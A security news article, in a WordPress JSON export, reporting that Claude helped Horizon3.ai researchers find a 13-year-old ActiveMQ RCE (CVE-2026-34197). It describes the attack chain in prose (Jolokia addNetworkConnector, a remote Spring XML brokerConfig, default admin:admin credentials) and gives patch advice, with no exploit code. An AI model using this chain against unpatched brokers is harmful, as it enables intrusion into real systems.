{"id":7777,"date":"2026-04-10T11:39:26","date_gmt":"2026-04-10T11:39:26","guid":{"rendered":"https:\/\/cybersecurityinfocus.com\/?p=7777"},"modified":"2026-04-10T11:39:26","modified_gmt":"2026-04-10T11:39:26","slug":"claude-uncovers-a-13%e2%80%91year%e2%80%91old-activemq-rce-bug-within-minutes","status":"publish","type":"post","link":"https:\/\/cybersecurityinfocus.com\/?p=7777","title":{"rendered":"Claude uncovers a 13\u2011year\u2011old ActiveMQ RCE bug within minutes"},"content":{"rendered":"
\n
\n
\n
\n
<\/div>\n

Anthropic\u2019s Claude dug up a critical remote code execution (RCE) bug that sat quietly inside Apache ActiveMQ Classic for over a decade.<\/p>\n

Researchers at Horizon3.ai say that it only took minutes for their team to work out an exploit chain for the bug with the help of AI. The researcher behind the work, Naveen Sunkavally, described the process as \u201c80% Claude with 20% gift-wrapping by a human.\u201d<\/p>\n

The bug, now fixed, could allow an attacker to use ActiveMQ\u2019s Jolokia API to make the server load a malicious configuration file from the internet and execute arbitrary system commands. The issue stems from the integration of multiple components developed independently over time. While each worked efficiently in isolation, together they allowed execution of remote code, a context Sunkavally noted was easier for Claude to spot.<\/p>\n

\u201cSomething that would have probably taken me a week manually took Claude 10 minutes,\u201d the researcher said in a blog post<\/a>.<\/p>\n

<\/a>Management API flaw allowed full RCE<\/h2>\n

The attack chain revolves around ActiveMQ\u2019s management plane. ActiveMQ exposes the Jolokia API at \u201c\/api\/jolokia\/\u201d, allowing authenticated users to invoke broker operations over HTTP. In vulnerable versions, attackers can abuse methods like \u201caddNetworkConnector\u201d to pass a crafted URL that allows the broker to load external configuration data.<\/p>\n

By embedding a malicious \u201cbrokerConfig\u201d parameter, the attacker forces ActiveMQ to fetch and process a remote Spring XML file. When the file loads, it can create and run any Java code, granting the attacker remote execution inside the broker.<\/p>\n

The flaw is tracked as CVE-2026-34197<\/a> and carries a high severity rating (CVSS 8.8). It affects ActiveMQ Classic versions prior to 5.19.4 and several 6.x releases.<\/p>\n

While, by definition, the exploit requires authentication, Sunkavally pointed out that default credentials like \u201cadmin:admin\u201d are still widely deployed in real environments. Worse, in certain ActiveMQ 6.x versions, a separate flaw (CVE-2024-32114) can expose the Jolokia API without any authentication.<\/p>\n

\u201cIn those versions, CVE-2026-34197 is effectively an unauthenticated RCE,\u201d he said.<\/p>\n

<\/a>AI accelerated discovery<\/h2>\n

ActiveMQ has been here before. The platform has a track record of high-impact vulnerabilities tied to management surfaces and unsafe assumptions around trusted inputs. From older web console flaws<\/a> to deserialization bugs<\/a> and protocol-level RCE<\/a>s, administrative functionalities have consistently become attack vectors.<\/p>\n

But none of the previous flaws were found the way CVE-2026-34197 was. The bug sat there for 13 years, with the first rollout of the affected implementation dating back to around 2012, before Claude could map out a multi-step exploit chain.<\/p>\n

The discovery is already teasing the much-buzzed successor to Claude\u2019s flaw-catching capabilities, Claude Mythos<\/a>. A vulnerability scanner and exploit generator so dangerous in the wrong hands that it has been restricted under early preview to a handful of companies, with big names of the AI and cybersecurity community coming together under \u201cProject Glasswing<\/a>\u201d to encourage its controlled usage.<\/p>\n

CVE-2026-34197 has been addressed in newer ActiveMQ Classic releases (6.2.3 and 5.19.4), and users must upgrade to patched versions to be protected.<\/p>\n<\/div>\n<\/div>\n<\/div>\n<\/div>","protected":false},"excerpt":{"rendered":"

Anthropic\u2019s Claude dug up a critical remote code execution (RCE) bug that sat quietly inside Apache ActiveMQ Classic for over a decade. Researchers at Horizon3.ai say that it only took minutes for their team to work out an exploit chain for the bug with the help of AI. The researcher behind the work, Naveen Sunkavally, […]<\/p>\n","protected":false},"author":0,"featured_media":7778,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[],"class_list":["post-7777","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-education"],"_links":{"self":[{"href":"https:\/\/cybersecurityinfocus.com\/index.php?rest_route=\/wp\/v2\/posts\/7777"}],"collection":[{"href":"https:\/\/cybersecurityinfocus.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/cybersecurityinfocus.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"replies":[{"embeddable":true,"href":"https:\/\/cybersecurityinfocus.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=7777"}],"version-history":[{"count":0,"href":"https:\/\/cybersecurityinfocus.com\/index.php?rest_route=\/wp\/v2\/posts\/7777\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/cybersecurityinfocus.com\/index.php?rest_route=\/wp\/v2\/media\/7778"}],"wp:attachment":[{"href":"https:\/\/cybersecurityinfocus.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=7777"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/cybersecurityinfocus.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=7777"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/cybersecurityinfocus.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=7777"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}